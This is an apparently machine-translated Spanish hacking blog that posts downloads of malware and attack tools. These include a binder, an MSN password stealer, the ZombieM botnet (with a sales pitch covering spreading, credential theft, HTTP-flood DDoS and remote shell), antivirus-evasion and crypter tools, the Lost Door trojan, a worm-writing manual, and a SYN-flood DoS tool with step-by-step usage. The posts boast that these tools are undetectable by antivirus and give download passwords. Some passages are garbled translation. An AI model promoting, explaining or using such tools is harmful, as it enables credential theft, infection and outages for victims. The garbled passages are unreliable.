Diamond Binder
Diamond Binder is an open source binder created by sharky; the tool has the basic functions of any binder. It is in Spanish and is very easy to use.
The complete source code of the stub and of the builder (VB6) is included; the code is clean and simple, ideal for those who are learning to program.
To the binder I detect him me Avira, but I am attacked NOD32 and KAV, surely is undetectable to the mayoria of the antivirus in the I gave of today.
Download
Diamond Binder (rapidshare)
Diamond Binder (megaupload)
Diamond Binder source code (rapidshare)
Diamond Binder source code (mediafire)
PS: I am leaving and return on Monday, and I do not plan to go near a PC, so the comments will not be updated until I return.
AMSNPS is a simple stealer created today by Arhack that sends by email the users and passwords saved by any version of MSN Messenger.
Basic usage
The program only works with Gmail accounts, since it uses Gmail's SMTP server to send the emails; the user and password of a Gmail account that will be used to send the data must be entered. I recommend creating an account exclusively for this.
The email with the passwords can be sent to any type of address.
Before creating the server, I recommend using the "Test" button to check that the configuration data is correct.
Once the sending data is entered, click "Create" and a new file, msnstealer.exe, is generated; this is the one that must be executed for the data to be sent.
The program obviously only sends the saved MSN users and passwords (saved with "remember password"); if no saved user or password is found, only a blank message with the PC info and the time is sent.
The following image shows that the server was executed on several PCs; the subject of the message includes the PC name and active user, and the message body contains the users and passwords.
The server
The server is not added to startup, does not create files and does not modify the registry; in short, it modifies absolutely nothing on the PC. On execution it tries to send the data instantly, and once the data is sent it closes automatically. If sending fails because there is no internet connection or for any other reason, it retries sending the message. As of today it is undetectable to all the known antivirus, although I do not believe that will last long.
Arhack MSN Password stealer 1,0 Beta (rapidshare)
Arhack MSN Password stealer 1,0 Beta (megaupload)
Pass: troyanosyvirus. com. ar
RunPE Killer is a generic unpacker, created by Psymera, for programs that use the RunPE module.
RunPE is used in the great majority of crypters, joiners, binders, etc.; all of those published on TYV use it. It is generally used to execute an encrypted file in memory once it has been decrypted, without having to drop the decrypted file on the hard disk.
With RunPE Killer the encrypted file can be unpacked to obtain the original, decrypted file. The decrypted file can then be analyzed.
RunPE Killer was tested with the following crypters and worked with all of them:
abstract
ACrypter 5 - By AdRi4N
Anti Nod-32 Crypter
area 51 crypter
Basic - Crypter v1.3 (Mod bob & D@rB-15)
BlueMorph-mod by legionpr and depuniet and fexx
Carb0n crypter 1,7 [fix]
Carb0n Crypter Mod by demonio666vip
Clown Crpter By dehombreadios
Countach (MOD by Hcinou)
Crypter By SuSo_v1_gracias_SkyWeb
DB Crypter v2.0 Mod Wally
DB cRYPTER ((((mod poison hacker)))
DonFelipe
Elite Packer
fexx cryptermod by linuxfer
HH-Crypter_Mod_By_J.V.B_
Ilusion crypter fixed!!
Undetectable Crypter 1.2b-(MOD POISON)-
Undetectable Krypt3r--MOD POISONHACKER
jodedor crypter mod by fexx
Kaka Crypter logan UPDATE 2
Level-23 Crypter (((MOD POISON ))))))
m3m0's Crypter reMod linuxfer
Madness Crypter mod by blackmaster1212
NT Crypter 2 by Kerberos5
Panther crypter
Panther Crypter fexx mod
RDG Tejon Crypter v0.8 Public Version
Represent Of Undetectable (semi fud mod LEGIONPR)
Rockito crypter xD
Schwarze Crypter Mod Logan
Schwarze Sonne Crypter Mod by likor
SiMpL3 CrYpT3R Mod by 1
simple crypter mod by fexx
Skull Crypter v2 By SuSaZo MOD By Depuniet
Skull_Crypter
Universal Crypter
Wolf Crypter 1.0.1
Wolf Crypter 1.0.2 100% FUD - FUCK AVIRA
I recommend using it only in virtual machines.
Download
RunPE Killer V. 1,0 By Psymera (rapidshare)
RunPE Killer V. 1,0 By Psymera (megaupload)
pass: troyanosyvirus. com. ar
PS: Goodbye RunPE! haha
Nmap is an open source program created by Fyodor that performs port scanning. It is used to evaluate the security of computer systems, as well as to discover services or servers on a computer network. It is one of the basic tools for any system administrator or hacker.
In this new version 600 changes were made, bugs were fixed, and it could be said that it is the first important version since the first release in 1997.
Basic features of Nmap
-Server discovery: It identifies computers on a network, for example by listing those that respond to ping.
-It identifies open ports on a target computer.
-It determines which services the target is running.
-It determines which operating system and version that computer uses (this technique is also known as fingerprinting).
-It obtains some characteristics of the network hardware of the machine under test.
The main improvements in version 5.0 of Nmap (by the dragonjar.org community)
-Inclusion of the new tool Ncat (like netcat but improved)
-Added the scan comparison tool Ndiff (to see changes between one scan and another)
-Performance improvement (notable)
-The official guide "Nmap Network Scanning" has been published
-The new Nmap Scripting Engine (NSE) lets us write and share scripts that automate tasks.
Below I leave the downloads of the binary with the Zenmap graphical interface so that it is easier to use, but on the official website you can find all the downloads for the different operating systems, as well as the source code and other versions.
Download
Nmap 5,0 win32 binary (rapidshare TYV)
Pass: troyanosyvirus. com. ar
Nmap 5,0 win32 binary (official page)
All the downloads: http://nmap.org/download.html
Information
Nmap reference guide (manual page)
Official web: www.nmap.org
ZombieM Bot is a new bot programmed by Arhack, designed to test the security of networks and to administer PCs running the Windows operating system massively and remotely.
Tasks
One of the characteristics that makes ZombieM stand out from the rest is the large number of tasks it can carry out and their effectiveness; the most important are briefly explained below.
Basic functions
ZombieM bot has the basic functions to administer the files of the connected PCs:
-Download file / Download and execute
-Execute file / Commands
-Create folders
-Delete file
-Delete folder
-Generate files with content (bat, txt, inf, reg, etc)
-Update server
Passwords
ZombieM captures and saves the passwords of:
-All the versions of MSN messenger
-Firefox 3
-Internet Explorer 6 and 7 (using plugin)
Spread - Propagation
-P2P propagation: It copies itself to the shared folders of the best-known P2P programs (Till, rival, limewire, etc).
It detects the shared folders from the Windows registry and copies a user-defined file (which it can download itself) or the bot itself. The name of the file to share can be specified.
-MSN propagation: It sends messages to all the MSN contacts of the connected bots. The user writes the message to send and the time interval to wait between one contact and the next.
-USB/disk propagation: It copies itself to all removable and local disks: pendrives, mp3, mp4, cell phones, cameras, memory cards, etc.
-LAN propagation: It detects 3 types of vulnerabilities in the network of the connected bots and takes advantage of those vulnerabilities to copy itself to the PCs of that network, for example via NetBIOS.
Creation of scripts (batch, VBS, etc)
ZombieM allows creating scripts of any type, for example in batch or Visual Basic Script, to execute them afterwards.
MSN
-Adds contacts
-Changes nicks
-Obtains MSN information (account, number of contacts, status, IP)
-Sends messages
Works with an MSN API compatible with all versions from 4.0 onward
Mailing lists
ZombieM obtains all the MSN Messenger contacts of all the contacts and saves them in a file for sending mail, or for whatever the user wishes.
Hosts file modification
ZombieM detects the location of the Windows Hosts file and modifies it as the user wishes, so that PCs visiting certain web pages are redirected to another, or simply to prevent them from visiting that site. It can be used in a business so that employees visiting a site prohibited by the business are redirected to another site, or so that children do not visit adult web pages.
Using this task for other ends can be illegal in some countries, and the user of the bot alone is responsible for such acts.
DDoS - Distributed denial of service attack
ZombieM has a very powerful HTTP flood to saturate the connection of web pages and thus take them down.
Use it only to test your own connections and to improve the protections of the server, or to find out whether another server should be used. Using it to take down web pages of competitors or similar can be illegal in some countries, and the user of the bot alone is responsible.
Other tasks
-Remote shell
-Visit web page in the foreground
-Send messages
-Server options: update, reconnect, disconnect, close, delete.
-And more..
The bot or server
-Maximum stability and speed; if the connection with the client is not established it reconnects in only a few seconds. Data is sent instantly. Stable on all known versions of Windows.
-Undetectable to the best-known antivirus and firewalls: NOD32, AVG, Kaspersky, Mcafee, Microsoft, Norton, Avira, etc.
-The bot is installed in 2 different places on the PC, and creates entries in the registry to start with Windows. It changes its location and installation method depending on whether the user has administrator privileges or not.
-Advanced encryption using 2 different encryption methods for all the vital strings of the bot, such as IP data, connection ports, names, etc. Almost impossible to decrypt (so as not to say impossible).
-It has a very good configuration; 2 different controls or IPs and ports can be selected, in case one fails. Connection data, the places it copies itself to, where it is added to the registry, etc. can be configured.
It supports a mutex, to prevent different bots from being executed on the same PC; the mutex can be changed to control which bot should be executed.
It also allows opening a web page when the bot is executed.
-The complete bot weighs ~109Kb with all its tools and uncompressed. Compressed it weighs only ~37Kb.
Maximum compatibility
ZombieM is compatible with the great majority of Windows systems: XP, Vista, 7 (seven), 2000, 98, ME, etc.
It does not require administrator privileges; it works perfectly in a User or Administrator account.
Automatic commands
ZombieM bot can send automatic commands at specific intervals, to all the bots or only to those selected (by country, version, etc).
It also sends commands to the bots that connect.
Connection system and control of PCs
The PCs connect directly to the ZombieM client, or by means of a proxy (I recommend ZM proxy), and are controlled by means of simple commands or by means of an easy-to-interpret graphical task panel.
All the PCs can be operated at the same time, or they can be operated in segments: by country, version, state, IP, etc.
Statistics and logs
ZombieM generates logs of all the tasks carried out, saves all the data received and the IPs that connect, counts PCs by country, and much more, as well as counting connections, disconnections (by error or not), etc.
Everything can be saved in .txt files to review later and compare in order to draw your own conclusions.
Technical support
If you need help with ZombieM do not hesitate to contact me; I will help you with whatever you need.
And much more...
It selects bots automatically, filters PCs by IP, exports all kinds of information to .HTML files, saves information, listens on 3 different ports at the same time, etc
Do you want something added or removed?
No problem; contact me and we will talk.
Legal notice
ZombieM was designed to be used only on PCs with the authorization of their respective owners. It should not be used for ends that can cause any damage to a person or object. Therefore neither the author of the program nor anyone else is responsible for misuse of this tool.
Purchase
ZombieM bot 2.0 has a cost of CANCELED, paid by means of Western Union; the purchase includes the complete ZombieM bot 2.0 with no limit on use on any PC, 2 servers undetectable to the best-known antivirus, and more. Servers and clients can be used on unlimited PCs.
If you are interested in purchasing, send a mail to ventas.tyv@gmail.com and I will contact you shortly; do not hesitate to ask any questions you have.
The complete product is sent 1 day after the money has been received.
Price: SALES CANCELED
Means of payment: Western Union
Contact: ventas.tyv@gmail.com
SALES CANCELED
Source Undetector is an application programmed by mFmTGL to make undetectable and to encrypt other applications programmed in Visual Basic 6.
General features:
Advanced Browsing: This gives us easier editing of sources, thanks to the intuitive menu, similar to that of Visual Basic, located in the Browse Project frame.
Syntax Editing: Something that could not be missing; it also gives us more comfort because it is similar to that of Visual Basic.
Beautiful Design: For the comfort of users a very pleasant design has been made, with icons, images, 3D buttons, etc.
Update Checker: Optional; what it does is check, if we wish, whether there is a new version.
Features for making undetectable by hand:
Scramble Code: An option that shuffles the lines. This is meant for the API declarations, since if one has no experience and it is applied to code the program can become non-functional. (Use: Select lines --> Right click --> Scramble Line Order)
Complex Code: In my opinion the best function of all, Complex Code. What this option does is "RIT" each of the selected lines by means of the GOTO function. It also adds junk code to get past heuristics. (Use: Select lines --> Right click --> Complex Code (Goto's))
String to Chr: What this function does is transform the selected string into characters; it is to get past the string detection of some antivirus. (Use: Select the string from one " to the other --> Right click --> String to CHR)
String to be Reviewed: Similar to the function above, only that it reverses the string and then returns it to its original state with the StrReverse function. (Use: Select the string from one " to the other --> Right click --> String to be Reviewed)
Encrypt String: What this function does is encrypt the string with XOR using a key of your choice. (Use: Select the string from one " to the other --> Right click --> Encrypt String --> Select Key --> Accept. Then add the XOR function to some module by right-clicking and choosing Add Xor Function)
Add Junk Code: This function adds junk code in a desired part of the code. (Use: Place the cursor on a blank line where the junk code is to be inserted, click on it and then right click --> Add Junk Code)
Features for locating signatures:
Comment Line: What this option does is comment out the desired lines, that is, when the project is compiled this code is not placed in the binary. Although the commented function will not work, it serves to locate the signature. (Use: Select the desired lines from the beginning --> Right click --> Comment Line).
UnComment Line: This does exactly the opposite of the above; it uncomments the selected lines. (Use: Select the desired lines from the beginning --> Right click --> UnComment Line).
Features for making undetectable (semiautomatic processes for the WHOLE project)
Crypt all strings: Very, very useful. What it does is encrypt ALL THE STRINGS of the project, letting you select the key. It does not encrypt APIs, which means no verification is needed and the process is automatic. (Use: Click Crypt all strings --> Select the Key --> Click Re-Encrypt Strings --> Click Confirm)
Be reviewed all strings: Similar to the function above, only that it reverses the string and then returns it to its original state with the StrReverse function. (Use: Click Be reviewed all strings --> Click Confirm)
All Strings to Char: What this function does is transform all the strings into characters; it is to get past the string detection of some antivirus. (Use: Click All strings to Char --> Confirm)
Randomize Function Names: Also one of the functions I like most. What it does is change the name of ALL the functions. NOTE: Not of the SUBS. (Use: Click Randomize Function Names --> Confirm)
Add Module: I also like this one a lot; it adds modules to the project.
Add Class Module: It does the same as the one above, only that it adds class modules.
Note: please contribute suggestions and report any bugs found.
For the correct use of the application the OCX files must be registered. Register the OCX files that come inside the OCX folder.
Any doubt about this, let me know.
Personally I recommend creating a folder called OCX on your disk, moving the content there, running register.exe and clicking the Register button.
Source Undetector 0,1 (rapidshare)
Source Undetector 0,1 (megaupload)
pass: troyanosyvirus. com. ar
Today the new version of Lost Door came out, v4.0 For, a Trojan with many tools.
In this new version an automatic MSN spread was added, it obtains the active window, the GUI was improved, and "they say" that the stability was improved.
The Trojan is characterized by its 3 spreads: P2P, MSN, and USB. Its GUI is very simple and it is also in Spanish, so it should be easy to use.
Official features:
[+] To be Reviewed Connection
[+] Webcam Shot
[+] You Give you& swindle Manger
[+] printer
[+] Control pannel
[+] Pc control
[+] Exucutor
[+] Two command
[+] Windows manager
[+] Screen Shot
[+] Remote server manager
[+] Server to remove
[+] Ip Graber
[+] Server Downloader
[+] Icon Changer
[+] Audio Streaming
[+] Encrypt Settings
[+] Volume Control
[+] Connection Logs
[+] Instaled Appliction
[+] Infect All USB
[+] P2P Spreading
[+] Msn Spreading
[+] Multilanguage
[+] Services Viewer
[+] Remote passwords
[+] MSN Controler
[+] Remote Shell
[+] Chat with server
[+] Send fake messages
[+] files manager
[+] Find files
[+] Change remote screen resolution
[+] Information about remote computer
[+] Clipboard manager
[+] IE options
[+] Running Process
[+] Troyanosyvirus. com. ar
[+] Online keylogger
[+] Offline keylogger
[+] Fun Menu
[+] Remote Nat viewer
[+] Rmote Resotr Manager
[+] Added Some Graphics
[+] Some minor Bugs fixed
[+] Some Forms there you Are Been Modified
[+] News Navigator was Added
[+] Invisible in Searching Files
[+] Server Size (120kb)
My opinion?
A Trojan very complete in functions and tools, but not very stable or secure; it also does not work well on Windows Vista. I would recommend it only as a secondary Trojan.
Download
Lost door v 4,0 For (rapidshare)
Lost door v 4,0 For (megaupload)
pass: troyanosyvirus. com. ar
This is a paper created by Hendrix for Abril Negro 2006 of the forum elhacker.net; the manual explains the basic concepts for creating a worm in Visual Basic 6. It is very well explained, above all for those who are just starting out in programming.
Index
1. Basics of a good malware
2. Complicating the disinfection of the worm
3. Propagation via P2P networks
4. Propagation via MSN
5. Anti-heuristic encryption against AVs
6. You sign in the PC
7. Propagation by e-mail (this one I still have to learn)
8. Infection of .exe and .rar files
9. Little surprises in the worm's code
The manual tries to explain the basic principle of operation, but if you want the worm to work 100% the code must be improved a little, for example by using system variables, keeping in mind that not all PCs have Spanish as their language, making it compatible with Windows Vista, etc.
I would also recommend changing the MSN propagation to use the Messenger API Type Library; with this it should work well on all PCs with Windows and MSN Live nowadays. In THIS LINK you can see examples of the use of this API.
In short, a great many things can be improved, and other propagation methods can even be added, such as USB or LAN, which are very popular nowadays.
Download
Creation of worms in VB (rapidshare)
Creation of worms in VB (megaupload)
Any doubts, leave a comment, and tell me if you like this type of contribution.
Today a new tool by m3m0_11 came out, the Jodedor 5x1, called 5x1 for the 5 tools it has in one. It is a crypter, joiner, downloader, packer.
Each of its tools is quite complete in functions; for example the binder lets you select where to extract, the execution method (it allows injecting into a process), wait time, etc.
The 4 stubs are undetectable and have a relatively small size of around 11kb.
The Jodedor 5x1 has the following tools:
Crypter: It encrypts files to protect them and leave them undetectable.
Joiner: Joins 2 or more files into a single file.
Downloader: It downloads one or more files and then executes them.
EOF writer: It adds EOF to the file.
Packer: It compresses the file.
As of today it is undetectable; may that last a few days at least!
Download
Jodedor 5X1 v0.1 (rapidshare)
Jodedor 5X1 v0.1 (megaupload)
Codejock control (required)
pass: troyanosyvirus. com. ar
Stop by the author's website: www.jodedorsoftware.tk
SYN Flood DoS is a program created by defc0n1 to perform denial of service by means of a flood of SYN packets. These SYN packets are connection requests, and they have false source IPs, so the connection is never completed and remains waiting. When thousands of requests have been sent, the server is left paralyzed and does not accept new connections.
Features
- It is much more effective when attacks are made from several points (DDoS)
- With thousands of connection attempts from false IPs and only a few true ones (those of the attackers), it is very difficult for the IDS or the system administrator to locate the real attackers.
- It is based on Nmap with the use of decoys
- It sends 115 SYNs per scan, that is, approximately every second and a half, depending on the power of the computer and of the network.
Usage
1- Open the program, and wait until it has fully loaded (it takes a while because it contains the complete Nmap, and has to decompress and load all the files)
2- If it is the first time you open it and you do not have WinPcap installed, it will show you the following notice:
((WARNING! It seems that you have not installed WinPcap. Its neccesary to run the DoS, do you want to install it now? Y/N:))
We type Y, press Enter and install it
If you already have it installed, type N and continue
3- It asks you to enter the Target, so enter the IP (for example 192.168.1.1) or the DNS (http://www.sgae.es/) that you want to attack.
4- You have to enter the port to attack. If it is a website it is HTTP (80), but if you want to attack another service such as FTP (21) or Telnet (23) you will have to enter its port. Evidently, the port has to be open and listening.
5- When it put "DoSing the target; -)" and down the escaneos leave of Nmap constantly, already these attacking to it kills
Text written by the author defc0n1
The program should be used only to test your own servers or networks; these attacks can be avoided.
I recommend looking up information on this type of DoS; on Wikipedia you can see the basic operation: in Spanish, or in English but more specific.
Download
SYN Flood DoS (rapidshare)
SYN Flood DoS (megaupload)
pass: troyanosyvirus. com. ar